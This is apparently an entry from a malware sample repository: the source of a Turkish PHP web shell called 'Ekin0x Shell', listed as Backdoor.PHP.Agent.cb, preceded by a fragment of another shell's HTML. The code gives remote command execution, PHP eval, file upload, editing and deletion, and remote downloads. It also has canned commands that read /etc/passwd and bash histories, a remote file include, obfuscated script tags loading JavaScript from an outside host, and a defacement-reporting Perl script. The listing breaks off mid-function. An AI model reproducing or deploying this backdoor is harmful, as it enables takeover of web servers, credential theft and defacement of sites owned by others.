<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
<p>&nbsp;</p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php include ($a.$b.$c); echo $safe_mode;?><br>
<span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
<span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
<span class="style8">Durum:</span> <?php echo @$stdata;?></td>
</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>

614
PHP/Backdoor.PHP.Agent.cb Normal file
View File

@ -0,0 +1,614 @@
<?
/*###########################################
Ekin0x Shell volume 2.1
Don't make any changes in c0de except if you dont know php programming
###########################################*/
$a = "http://";
$b = "room-escape-games.com";
$c = "/x.html";
error_reporting(0);
set_magic_quotes_runtime(0);
if(version_compare(phpversion(), '4.1.0') == -1)
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
else{return $requ."?".$link."=".$val;}}
function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
$nscmd=htmlspecialchars($scmd);print $nscmd;}
elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
print htmlspecialchars($pret);}}
function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";}
elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}
function permcol($path){if (is_writable($path)){print "<font color=red>";
callperms($path); print "</font>";}
elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
callperms($path); print "</font>";}
else {print "<font color=DeepSkyBlue >";callperms($path);}}
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
function download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");
@header("Content-Length: $size");
@header("Content-Disposition: attachment; filename=$dwfile");
@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");
@readfile($dwfile); exit;}
?>
<? include $_GET['baba']; ?>
<html>
<head><title>Ekin0x Shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
</body>
</html>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u0065\u006e\u0074\u0065\u0078\u0068\u0075\u006d\u006d\u0065\u0072\u0063\u006c\u0075\u0062\u002e\u0063\u006f\u006d\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u0065\u006e\u0074\u0065\u0078\u0068\u0075\u006d\u006d\u0065\u0072\u0063\u006c\u0075\u0062\u002e\u0063\u006f\u006d\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
<?
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
################# Ending of common variables ########################
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ##
</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
print " - <a href='javascript:history.back()'>Geri</a>";
print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
if ($dlink=='phpinfo'){print phpinfo();die();}
print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Izinleri Kontrol Et</a>";
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input ("text","ncbase",$ncbase,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
print "<p><b>[ Url - Decoder ]</b>"; print $sf;
input ("text","nurld",$nurld,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input ("text","nmdf",$nmdf,35);print " ";
input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
print "<pre>";print "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
input ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
input ("text","hlp","",35);print " ";
input ("submit","","Help","");print $ef; die();}
if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
{if (touch ($_REQUEST['indx'])==true){
$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
input ("submit","mailsub","Send-mail","");print $ef;die();}
if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
function inisaf($iniv) { $chkini=ini_get($iniv);
if(($chkini || strtolower($chkini)) !=='on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";} else{
print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
if ($chkin==""){print " <font color=red><b>None</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
while (!feof($opop)){ $nval= fgetc($opop);}}
elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";
print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>"; print"<td>";print"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');
print"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<b>IP Numaran : ".$REMOTE_ADDR."<br></b>";
print "<b>Server IP : ".$SERVER_ADDR."</b>";
print"<br><b>".$SERVER_SIGNATURE."</b>";
print "<b>Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
print "<b>Kimsin : <b>"; callfuncs('id');print"<br><b>Os : </b>";
if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print php_uname(); print "/";print PHP_OS;}
else {callfuncs('uname -a');}}print"<br>";
print"Php-versiyon : ".phpversion(); print"<br><b>Current-path : </b>";
print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
print"<br>";print "Shell'in Burda : " .__file__;
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
print"Bos Alan: "; readable_size(disk_free_space($nscdir));
print "</center><br></font>"; print"</td></tr></table><br>";
if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);
if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
else{ $mess3= "Dosya Olustur/Sil";}}
elseif(isset($_REQUEST['delfile'])){
$ndfile=trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
else {$mess3= "Dosya Olustur/Sil";}}
else {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
if (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){
if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Dosyalar";print "</td>";
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Boyut";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Yazma";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Okuma";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Tür";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Düzenleme";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Adlandirma";print "</td>";
print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Indir";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Group";print "</td>";}
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Izinler";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=DeepSkyBlue >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
$scmess3= "<center><font color=DeepSkyBlue >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=DeepSkyBlue >Dosya";}
print"<tr><td style=\"border:1px solid black\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
print"</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 color=#dadada>";
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
print"<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid black\">";
if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid black\">";
print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
print "</center>";print"</td>";}
print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
print "<pre><center>".$sta;
if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){
ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
elseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){
$fp=fopen ($rfile,"r");print"<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
while (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}
fclose($fp);print "</textarea>";if (is_writable($rfile)){
print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
fwrite ($rffp,$rfiletxt);print "<div><b><center>
[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
function callperms($chkperms){
$perms = fileperms($chkperms);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
